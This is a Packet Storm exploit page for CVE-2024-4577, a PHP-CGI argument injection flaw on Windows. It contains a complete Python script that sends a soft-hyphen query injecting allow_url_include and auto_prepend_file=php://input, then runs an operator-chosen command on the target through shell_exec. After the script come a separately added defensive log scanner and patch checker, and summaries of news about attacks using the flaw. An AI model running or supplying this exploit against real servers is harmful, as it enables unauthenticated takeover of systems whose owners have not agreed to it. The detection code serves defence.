PHP Remote Code Execution

PHP versions prior to 8.3.8 suffer from a remote code execution vulnerability.

Packet Storm
```python
# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.php.net/downloads.php
# Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29
# CVE : CVE-2024-4577

from requests import Request, Session
import sys
import json


def title():
    # Print the author banner.
    print(r'''
       _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  |
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / /
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \   / /    / /
 | |____   \  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /
  \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/

Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py
    ''')


def exploit(url, command):
    payloads = {
        '<?php echo "vulnerable"; ?>',
        '<?php echo shell_exec("'+command+'"); ?>'
    }

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    s = Session()
    for payload in payloads:
        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        req = Request('POST', url, data=payload, headers=headers)
        prepped = req.prepare()
        del prepped.headers['Content-Type']
        resp = s.send(prepped,
                      verify=False,
                      timeout=15)
        #print(prepped.headers)
        #print(url)
        #print(resp.headers)
        #print(payload)
        print(resp.status_code)
        print(resp.text)


if __name__ == '__main__':
    title()
    # Both the target URL and the command are required.
    if len(sys.argv) < 3:
        print('[+] USAGE: python3 %s https://<target_url> <command>\n' % (sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10 dir\n' % (sys.argv[0]))
        sys.exit(0)
    else:
        exploit(sys.argv[1], sys.argv[2])
```
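A defender-side companion to the request above, added here and not part of the original exploit or advisory: it scans web access logs for query-string arguments that begin with the byte 0xAD (`%AD`) and checks a PHP version string against the fixed releases named on this page. The function names, the combined log format, plain `X.Y.Z` version strings and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import unquote_to_bytes

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# php.ini directives the request on this page sets through "-d".
DIRECTIVES = (b"allow_url_include", b"auto_prepend_file")
# First fixed release per branch, as listed on this page.
FIXED = {(8, 3): 8, (8, 2): 20, (8, 1): 29}


def soft_hyphen_args(target):
    """Return decoded query tokens that start with byte 0xAD."""
    query = target.partition("?")[2].partition("#")[0]
    tokens = [unquote_to_bytes(t) for t in query.split("+")]
    return [t for t in tokens if t.startswith(b"\xad")]


def scan(lines):
    """Return (line_number, severity, target) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match or not soft_hyphen_args(match["target"]):
            continue
        decoded = unquote_to_bytes(match["target"]).lower()
        severity = "high" if any(d in decoded for d in DIRECTIVES) else "review"
        findings.append((number, severity, match["target"]))
    return findings


def is_patched(version):
    """True if an 'X.Y.Z' PHP version has the fix; EOL branches never do."""
    major, minor, patch = (int(p) for p in version.split(".")[:3])
    if (major, minor) in FIXED:
        return patch >= FIXED[(major, minor)]
    return (major, minor) > max(FIXED)


# Constructed sample access-log lines (documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jun/2024:09:14:02 +0000] "GET /index.php?id=5 HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jun/2024:09:14:05 +0000] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 88',
    '192.0.2.10 - - [10/Jun/2024:09:15:11 +0000] "GET /search.php?q=caf%C3%A9+bar HTTP/1.1" 200 901',
    '198.51.100.7 - - [10/Jun/2024:09:16:40 +0000] "GET /php-cgi/php-cgi.exe?%add+foo%3dbar HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "review" finding means a 0xAD-prefixed argument was seen without the two directives used on this page, so the request still deserves a look.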

Related news

Hackers Exploit PHP Vulnerability to Deploy Stealthy Msupedge Backdoor

A previously undocumented backdoor named Msupedge has been put to use against a cyber attack targeting an unnamed university in Taiwan. "The most notable feature of this backdoor is that it communicates with a command-and-control (C&C) server via DNS traffic," the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News. The origins of the backdoor are

Gentoo Linux Security Advisory 202408-32

Gentoo Linux Security Advisory 202408-32 - Multiple vulnerabilities have been discovered in PHP, the worst of which can lead to a denial of service. Versions greater than or equal to 8.1.29:8.1 are affected.

PHP Vulnerability Exploited to Spread Malware and Launch DDoS Attacks

Multiple threat actors have been observed exploiting a recently disclosed security flaw in PHP to deliver remote access trojans, cryptocurrency miners, and distributed denial-of-service (DDoS) botnets. The vulnerability in question is CVE-2024-4577 (CVSS score: 9.8), which allows an attacker to remotely execute malicious commands on Windows systems using Chinese and Japanese language locales. It

PHP CGI Argument Injection Remote Code Execution

This Metasploit module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations on a Windows target. A vulnerable configuration is locale dependent (such as Chinese or Japanese), such that the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D) character. Additionally, a target web server must be configured to run PHP under CGI mode, or directly expose the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch), and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have not received patches. XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.

TellYouThePass Ransomware Group Exploits Critical PHP Flaw

An RCE vulnerability that affects the Web scripting language on Windows systems is easy to exploit and can provide a broad attack surface.
